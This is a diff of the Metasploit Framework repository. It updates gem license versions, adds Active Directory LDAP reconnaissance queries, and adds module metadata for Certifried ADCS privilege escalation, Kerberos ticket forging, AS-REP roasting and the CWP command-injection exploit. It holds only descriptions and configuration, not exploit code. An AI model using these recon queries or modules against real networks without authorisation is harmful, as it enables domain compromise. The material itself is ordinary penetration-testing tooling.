+distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+Please see the License for the specific language governing rights and
+limitations under the License."
@@ -1,10 +1,10 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.7, MIT
-actionview, 6.1.7, MIT
-activemodel, 6.1.7, MIT
-activerecord, 6.1.7, MIT
-activesupport, 6.1.7, MIT
+actionpack, 7.0.4.1, MIT
+actionview, 7.0.4.1, MIT
+activemodel, 7.0.4.1, MIT
+activerecord, 7.0.4.1, MIT
+activesupport, 7.0.4.1, MIT
 addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
@@ -68,12 +68,12 @@ logging, 2.3.1, MIT
 loofah, 2.19.1, MIT
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.5, "New BSD"
+metasploit-concern, 5.0.0, "New BSD"
 metasploit-credential, 6.0.1, "New BSD"
-metasploit-framework, 6.2.37, "New BSD"
-metasploit-model, 4.0.6, "New BSD"
+metasploit-framework, 6.3.1, "New BSD"
+metasploit-model, 5.0.0, "New BSD"
 metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.6, "New BSD"
+metasploit_data_models, 6.0.1, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.1, MIT
@@ -113,9 +113,10 @@ rack-protection, 3.0.5, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.4.4, MIT
-railties, 6.1.7, MIT
+railties, 7.0.4.1, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
+rasn1, 0.12.0, MIT
 rb-readline, 0.5.5, BSD
 recog, 3.0.3, unknown
 redcarpet, 3.5.1, MIT
@@ -123,7 +124,7 @@ regexp_parser, 2.6.1, MIT
 reline, 0.3.2, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.28, "New BSD"
+rex-core, 0.1.29, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
 rex-exploitation, 0.1.36, "New BSD"
 rex-java, 0.1.6, "New BSD"
@@ -134,7 +135,7 @@ rex-powershell, 0.1.97, "New BSD"
 rex-random_identifier, 0.1.9, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.43, "New BSD"
+rex-socket, 0.1.45, "New BSD"
 rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
 rex-text, 0.2.47, "New BSD"
@@ -155,7 +156,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.1, "New BSD"
+ruby_smb, 3.2.4, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -165,6 +166,7 @@ simpleidn, 0.2.1, MIT
 sinatra, 3.0.5, MIT
 sqlite3, 1.5.4, "New BSD"
 sshkey, 2.0.0, MIT
+strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
@@ -183,7 +185,7 @@ webrick, 1.7.0, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
-windows_error, 0.1.4, BSD
+windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
@@ -9,6 +9,7 @@ queries:
      - description
      - displayName
      - sAMAccountName
+      - objectSID
      - userPrincipalName
      - userAccountControl
      - homeDirectory
@@ -92,12 +93,14 @@ queries:
    filter: '(|(objectCategory=computer)(objectClass=computer))'
    attributes:
      - dn
+      - name
+      - description
      - displayName
+      - sAMAccountName
+      - objectSID
      - distinguishedName
      - dNSHostName
-      - description
      - givenName
-      - name
      - operatingSystem
      - operatingSystemVersion
      - operatingSystemServicePack
@@ -140,6 +143,18 @@ queries:
      - distinguishedName
    references:
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_DOMAIN
+    description: 'Dump info about the Active Directory domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+      - objectSID
+      - name
+      - lockoutduration
+      - lockoutthreshold
+      - minpwdage
+      - maxpwdage
+      - minpwdlength
  - action: ENUM_DOMAIN_CONTROLLERS
    description: 'Dump all known domain controllers.'
    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
@@ -253,6 +268,13 @@ queries:
      - dnsHostName
    references:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_MACHINE_ACCOUNT_QUOTA
+    description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+    references:
+      - https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
  - action: ENUM_ORGROLES
    description: 'Dump info about all known organization roles in the LDAP environment.'
    filter: '(objectClass=organizationalRole)'
@@ -15,7 +15,7 @@
 <% end %>

 ## Module Ranking
-<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
+<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>

 **<%= items[:mod_rank_name] %>**

@@ -47,7 +47,7 @@
 <% end %>

 ## Module Traits
-<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
+<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>

 <% unless items[:mod_side_effects].empty? %>
 ### Side Effects
@@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
 msf <%= mod.type %>(<%= mod.shortname %>) > generate
 ```

-To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
+To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).
@@ -595,9 +595,9 @@
    "session_types": false,
    "needs_cleanup": false
  },
-  "auxiliary_admin/dcerpc/icpr_cert": {
-    "name": "ICPR Certificate Management",
-    "fullname": "auxiliary/admin/dcerpc/icpr_cert",
+  "auxiliary_admin/dcerpc/cve_2022_26923_certifried": {
+    "name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)",
+    "fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried",
    "aliases": [

    ],
@@ -606,11 +606,15 @@
    "type": "auxiliary",
    "author": [
      "Oliver Lyak",
-      "Spencer McIntyre"
+      "CravateRouge",
+      "Erik Wynter",
+      "Christophe De La Fuente"
    ],
-    "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n          template's configuration the resulting certificate can be used for various operations such as authentication.\n          PFX certificate files that are saved are encrypted with a blank password.",
+    "description": "This module exploits a privilege escalation vulnerability in Active\n          Directory Certificate Services (ADCS) to generate a valid certificate\n          impersonating the Domain Controller (DC) computer account. This\n          certificate is then used to authenticate to the target as the DC\n          account using PKINIT preauthentication mechanism. The module will get\n          and cache the Ticket-Granting-Ticket (TGT) for this account along\n          with its NTLM hash. Finally, it requests a TGS impersonating a\n          privileged user (Administrator by default). This TGS can then be used\n          by other modules or external tools.",
    "references": [
-
+      "URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4",
+      "URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html",
+      "CVE-2022-26923"
    ],
    "platform": "",
    "arch": "",
@@ -624,7 +628,63 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-08-25 08:49:52 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/cve_2022_26923_certifried",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Certifried"
+      ],
+      "Reliability": [
+        "crash-safe"
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/dcerpc/icpr_cert": {
+    "name": "ICPR Certificate Management",
+    "fullname": "auxiliary/admin/dcerpc/icpr_cert",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Will Schroeder",
+      "Lee Christensen",
+      "Oliver Lyak",
+      "Spencer McIntyre"
+    ],
+    "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n          template's configuration the resulting certificate can be used for various operations such as authentication.\n          PFX certificate files that are saved are encrypted with a blank password.",
+    "references": [
+      "URL-https://github.com/GhostPack/Certify",
+      "URL-https://github.com/ly4k/Certipy"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-12-02 16:29:02 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/icpr_cert",
@@ -640,6 +700,10 @@
      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "AKA": [
+        "Certifry",
+        "Certipy"
      ]
    },
    "session_types": false,
@@ -674,7 +738,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-21 13:40:38 +0000",
+    "mod_time": "2022-12-02 16:29:02 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/samr_computer",
@@ -5144,6 +5208,213 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/kerberos/forge_ticket": {
+    "name": "Kerberos Silver/Golden Ticket Forging",
+    "fullname": "auxiliary/admin/kerberos/forge_ticket",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Benjamin Delpy",
+      "Dean Welch"
+    ],
+    "description": "This module forges a Kerberos ticket",
+    "references": [
+      "URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-01-24 13:28:10 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/forge_ticket",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "AKA": [
+        "Silver Ticket",
+        "Golden Ticket",
+        "Ticketer",
+        "Klist"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/kerberos/get_ticket": {
+    "name": "Kerberos TGT/TGS Ticket Requester",
+    "fullname": "auxiliary/admin/kerberos/get_ticket",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Christophe De La Fuente",
+      "Spencer McIntyre",
+      "Will Schroeder",
+      "Lee Christensen",
+      "Oliver Lyak",
+      "smashery"
+    ],
+    "description": "This module requests TGT/TGS Kerberos tickets from the KDC",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 88,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-01-24 15:12:00 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/get_ticket",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "getTGT",
+        "getST"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/kerberos/inspect_ticket": {
+    "name": "Kerberos Ticket Inspecting",
+    "fullname": "auxiliary/admin/kerberos/inspect_ticket",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Dean Welch"
+    ],
+    "description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n          decrypts and displays the encrypted content too.\n          Can be used for inspecting tickets that aren't working as intended in an effort to debug them.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-01-26 09:21:55 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/inspect_ticket",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "AKA": [
+        "klist"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/kerberos/keytab": {
+    "name": "Kerberos keytab utilities",
+    "fullname": "auxiliary/admin/kerberos/keytab",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n          more principals.\n\n          Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n          offline.\n\n          Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n          including the krbtgt encrypted blobs if the AES password hash is used.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-12-07 23:03:57 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/keytab.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/keytab",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
    "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
    "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
@@ -5178,7 +5449,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-08 11:35:31 +0000",
+    "mod_time": "2023-01-27 09:11:43 +0000",
    "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -5190,6 +5461,58 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/kerberos/ticket_converter": {
+    "name": "Kerberos ticket converter",
+    "fullname": "auxiliary/admin/kerberos/ticket_converter",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Zer1t0",
+      "Dean Welch"
+    ],
+    "description": "This module converts tickets to the ccache format from the kirbi format and vice versa.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py",
+      "URL-https://tools.ietf.org/html/rfc4120",
+      "URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html",
+      "URL-https://github.com/gentilkiwi/kekeo",
+      "URL-https://github.com/rvazarkar/KrbCredExport"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-09-28 22:28:54 +0000",
+    "path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb",
+    "is_install_path": true,
+    "ref_name": "admin/kerberos/ticket_converter",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/ldap/rbcd": {
    "name": "Role Base Constrained Delegation",
    "fullname": "auxiliary/admin/ldap/rbcd",
@@ -6000,7 +6323,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2021-04-22 10:15:04 +0000",
+    "mod_time": "2022-06-29 12:20:37 +0000",
    "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
    "is_install_path": true,
    "ref_name": "admin/mssql/mssql_idf",
@@ -18598,7 +18921,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-05-17 17:04:49 +0000",
+    "mod_time": "2023-01-17 18:59:12 +0000",
    "path": "/modules/auxiliary/gather/get_user_spns.py",
    "is_install_path": true,
    "ref_name": "gather/get_user_spns",
@@ -19595,7 +19918,8 @@
    "type": "auxiliary",
    "author": [
      "Matt Byrne <attackdebris@gmail.com>",
-      "alanfoster"
+      "alanfoster",
+      "sjanusz-r7"
    ],
    "description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n          the different responses returned by the service for valid and invalid users.",
    "references": [
@@ -19611,12 +19935,12 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-08 18:45:03 +0000",
+    "mod_time": "2022-05-27 13:34:10 +0000",
    "path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
    "is_install_path": true,
    "ref_name": "gather/kerberos_enumusers",
    "check": false,
-    "post_auth": false,
+    "post_auth": true,
    "default_credential": false,
    "notes": {
    },
@@ -19827,7 +20151,7 @@
    "author": [
      "Grant Willcox"
    ],
-    "description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n          a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n          file containing custom queries to be executed using the RUN_QUERY_FILE action.\n          If this action is specified, then QUERY_FILE_PATH must be a path to the location\n          of this JSON/YAML file on disk.\n\n          Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n          the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n          to a comma seperated string containing the list of attributes they are interested in obtaining\n          from the results.\n\n          As a third option can run one of several predefined queries by setting ACTION to the\n          appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n          located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n          All results will be returned to the user in table, CSV or JSON format, depending on the value\n          of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n          should multiple items exist within a single column.",
+    "description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n          a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n          file containing custom queries to be executed using the RUN_QUERY_FILE action.\n          If this action is specified, then QUERY_FILE_PATH must be a path to the location\n          of this JSON/YAML file on disk.\n\n          Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n          the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n          to a comma separated string containing the list of attributes they are interested in obtaining\n          from the results.\n\n          As a third option can run one of several predefined queries by setting ACTION to the\n          appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n          located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n          All results will be returned to the user in table, CSV or JSON format, depending on the value\n          of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n          should multiple items exist within a single column.",
    "references": [

    ],
@@ -19841,7 +20165,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-12-04 17:41:24 +0000",
+    "mod_time": "2023-01-24 11:23:28 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -21918,7 +22242,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-13 10:13:27 +0000",
+    "mod_time": "2022-12-07 23:03:57 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -32845,7 +33169,8 @@
      "OSVDB-877",
      "BID-11604",
      "BID-9506",
-      "BID-9561"
+      "BID-9561",
+      "URL-https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS"
    ],
    "platform": "",
    "arch": "",
@@ -32866,7 +33191,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-01-15 06:37:11 +0000",
    "path": "/modules/auxiliary/scanner/http/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/options",
@@ -38772,6 +39097,54 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/kerberos/kerberos_login": {
+    "name": "Kerberos Authentication Check Scanner",
+    "fullname": "auxiliary/scanner/kerberos/kerberos_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "This module will test Kerberos logins on a range of machines and\n          report successful logins.  If you have loaded a database plugin\n          and connected to a database this module will record successful\n          logins and hosts so you can track your access.\n\n          Kerberos accounts which do not require pre-authentication will\n          have the TGT logged for offline cracking, this technique is known as AS-REP Roasting.\n\n          It is also able to identify whether user accounts are enabled or\n          disabled/locked out.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 88,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-12-14 18:28:16 +0000",
+    "path": "/modules/auxiliary/scanner/kerberos/kerberos_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/kerberos/kerberos_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "account-lockouts",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/llmnr/query": {
    "name": "LLMNR Query",
    "fullname": "auxiliary/scanner/llmnr/query",
@@ -40288,7 +40661,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
@@ -46440,7 +46813,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-09 11:23:26 +0000",
+    "mod_time": "2023-01-13 17:31:02 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -46564,7 +46937,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -46746,7 +47119,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-12 09:29:53 +0000",
+    "mod_time": "2023-01-25 13:58:29 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -50083,7 +50456,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-01-28 10:35:25 +0000",
+    "mod_time": "2022-11-30 11:32:23 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_auth_methods",
@@ -50133,7 +50506,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-09-10 15:13:30 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
@@ -50184,7 +50557,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-09-24 12:01:30 +0000",
+    "mod_time": "2023-01-24 14:30:39 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
@@ -50234,12 +50607,12 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2021-01-28 10:35:25 +0000",
+    "mod_time": "2023-01-03 19:54:06 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_wql",
    "check": false,
-    "post_auth": true,
+    "post_auth": false,
    "default_credential": false,
    "notes": {
    },
@@ -57172,7 +57545,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-07-18 23:31:34 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/intel_sysret_priv_esc",
@@ -57228,7 +57601,7 @@
      "FreeBSD 12.0-RELEASE r341666",
      "FreeBSD 12.1-RELEASE r354233"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-02 18:45:43 +0000",
    "path": "/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/ip6_setpktopt_uaf_priv_esc",
@@ -57236,6 +57609,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
      "Stability": [
        "crash-os-restarts"
      ],
@@ -57336,7 +57712,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-08-24 11:47:50 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "freebsd/local/rtld_execl_priv_esc",
@@ -60094,6 +60470,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/control_web_panel_login_cmd_exec": {
+    "name": "CWP login.php Unauthenticated RCE",
+    "fullname": "exploit/linux/http/control_web_panel_login_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-05",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "Numan Türle"
+    ],
+    "description": "Control Web Panel versions < 0.9.8.1147 are vulnerable to\n          unauthenticated OS command injection. Successful exploitation results\n          in code execution as the root user. The results of the command are not\n          contained within the HTTP response and the request will block while\n          the command is running.",
+    "references": [
+      "CVE-2022-44877",
+      "URL-https://github.com/numanturle/CVE-2022-44877",
+      "URL-https://control-webpanel.com/changelog#1674073133745-84af1b53-c121"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 2031,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-01-25 13:45:18 +0000",
+    "path": "/modules/exploits/linux/http/control_web_panel_login_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/control_web_panel_login_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/cpi_tararchive_upload": {
    "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
    "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -72168,7 +72607,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/abrt_sosreport_priv_esc.rb",
    "is_install_path": true,
